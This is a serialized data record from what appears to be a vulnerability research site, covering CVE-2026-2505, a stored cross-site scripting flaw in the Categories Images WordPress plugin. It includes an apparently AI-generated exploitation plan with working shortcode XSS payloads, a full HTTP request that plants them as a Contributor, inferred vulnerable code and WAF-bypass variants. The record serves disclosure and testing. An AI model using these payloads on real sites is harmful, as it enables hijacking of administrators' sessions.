[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwNhu_78cTnc0-Akovd8ob8EkEEGpjMOL-mUW0TN-O5E":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2026-2505","categories-images-authenticated-contributor-stored-cross-site-scripting-via-ztaxonomyimage-shortcode","Categories Images \u003C= 3.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'z_taxonomy_image' Shortcode","The Categories Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3.1, via the 'z_taxonomy_image' shortcode. This is due to the shortcode rendering path passing attacker-controlled class input into a fallback image builder that concatenates HTML attributes without proper escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts that execute when users interact with the injected frontend page via the 'class' shortcode attribute.","categories-images",null,"\u003C=3.3.1","3.3.2","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-17 21:16:01","2026-04-18 09:26:54",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F34fb64d5-e152-4950-9ef4-6d53a97a56fb?source=api-prod",1,[22,23,24],"categories-images.php","readme.txt","templates\u002Fadmin.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2505\n\n## 1. Vulnerability Summary\nThe **Categories Images** plugin (versions \u003C= 3.3.1) contains a Stored Cross-Site Scripting (XSS) vulnerability via the `[z_taxonomy_image]` shortcode. The vulnerability exists because the plugin's shortcode rendering logic processes the `class` attribute and passes it into an internal HTML image builder. This builder fails to properly escape the attribute value before concatenating it into an `\u003Cimg>` tag. An authenticated user with **Contributor** permissions or higher can inject a malicious payload into the `class` attribute of the shortcode within a post or page. When a site visitor (especially an administrator) views the rendered content, the script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post Editor (Gutenberg or Classic) via standard `wp-admin\u002Fpost-new.php` or `wp-admin\u002Fpost.php`.\n*   **Shortcode:** `[z_taxonomy_image]`\n*   **Vulnerable Parameter:** `class` attribute within the shortcode.\n*   **Authentication Level:** Contributor+ (any user capable of creating or editing posts and using shortcodes).\n*   **Preconditions:** The plugin must be active. A taxonomy term (like a category) should exist, though the shortcode might attempt to render a placeholder even if the `term_id` is invalid.\n\n## 3. Code Flow\n1.  **Registration:** In `categories-images.php`, the `zInit()` method registers the shortcode:\n    ```php\n    add_shortcode('z_taxonomy_image', [$this, 'z_taxonomy_image_shortcode']);\n    ```\n2.  **Handling:** When a post is rendered, `z_taxonomy_image_shortcode($atts)` is invoked.\n3.  **Processing:** The shortcode handler extracts attributes, including `class`.\n4.  **Rendering Sink:** The handler calls the internal function `z_taxonomy_image()` (likely a method in the `ZCategoriesImages` class or a global function as indicated in `templates\u002Fadmin.php`).\n5.  **Vulnerable Concatenation:** Inside the \"fallback image builder\" (invoked when a direct attachment image isn't used or when building custom attributes), the code performs raw concatenation:\n    ```php\n    \u002F\u002F Inferred logic based on vulnerability description:\n    $html = '\u003Cimg src=\"' . $image_url . '\"';\n    if (isset($attr['class'])) {\n        $html .= ' class=\"' . $attr['class'] . '\"'; \u002F\u002F SINK: No esc_attr() used here\n    }\n    $html .= ' \u002F>';\n    ```\n6.  **Output:** The unescaped HTML string is returned to the WordPress shortcode API and printed to the page.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability **does not require a specific nonce** for exploitation. The attack relies on the standard WordPress post creation\u002Fediting workflow.\n*   Contributors have the native capability to save posts containing shortcodes.\n*   WordPress handles the nonces for post saving (`_wpnonce` in the `post.php` request).\n*   The XSS executes upon viewing the frontend, where no nonce check is performed for shortcode expansion.\n\n## 5. Exploitation Strategy\n### Step-by-Step Plan\n1.  **Authentication:** Log in as a user with the **Contributor** role.\n2.  **Discovery:** Identify an existing Category ID (e.g., Category ID 1).\n3.  **Payload Injection:** Create a new post containing the malicious shortcode.\n    *   **Payload:** `[z_taxonomy_image term_id=\"1\" class='xss\" onmouseover=\"alert(document.domain)\" style=\"padding:100px;border:5px solid red;\" data-xss=\"']`\n    *   **Alternative Payload (Breakout):** `[z_taxonomy_image class='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n4.  **Submission:** Save the post as a draft or submit for review.\n5.  **Trigger:** Navigate to the post's permalink (or preview it) as an Administrator.\n\n### HTTP Request (Contributor creating the post)\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [Contributor Cookies]\n\naction=editpost&post_ID=[POST_ID]&post_type=post&post_title=XSS+Test&content=[z_taxonomy_image+class%3D'%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E']&_wpnonce=[NONCE]\n```\n\n## 6. Test Data Setup\n1.  **User:** Create a user with the `contributor` role.\n2.  **Category:** Ensure at least one category exists. Note its ID (usually `1` for 'Uncategorized').\n3.  **Plugin Configuration:** No specific configuration is required, but ensuring \"Excluded Taxonomies\" in `Settings > Categories Images` does not include `category` is important.\n\n## 7. Expected Results\n1.  The `[z_taxonomy_image]` shortcode will be processed by WordPress.\n2.  The resulting HTML will contain:\n    `\u003Cimg ... class=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" ...>`\n3.  When viewing the page, a JavaScript alert box showing the document domain will appear.\n\n## 8. Verification Steps\n1.  **Browser Verification:** Use `browser_navigate` to the URL of the created post and check for the `alert` or presence of the injected script in the DOM using `browser_eval`.\n    *   `browser_eval(\"document.querySelector('img').outerHTML\")`\n2.  **WP-CLI Verification:** Verify the post content was stored correctly:\n    *   `wp post get [POST_ID] --field=post_content`\n3.  **Source Inspection:** View the page source and search for the string `\u003Cscript>alert`.\n\n## 9. Alternative Approaches\n*   **Attribute Injection:** If `\u003Cscript>` tags are filtered by a WAF, use event handlers:\n    `[z_taxonomy_image class='xss\" onmouseover=\"alert(1)\"']`\n*   **Placeholder Trigger:** If no image is assigned to the category, the plugin uses `zci_placeholder` (defined in the constructor as `assets\u002Fimages\u002Fplaceholder.png`). This often triggers the \"fallback image builder\" path, which is specifically mentioned as vulnerable.\n*   **Taxonomy List:** Check if the `[z_taxonomy_list]` shortcode (also overhauled in 3.3.0) shares the same vulnerable rendering logic for its grid\u002Flist items.","gemini-3-flash-preview","2026-04-20 13:15:30","2026-04-20 13:15:55",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","3.3.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcategories-images\u002Ftags\u002F3.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcategories-images.3.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcategories-images\u002Ftags\u002F3.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcategories-images.3.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcategories-images\u002Ftags"]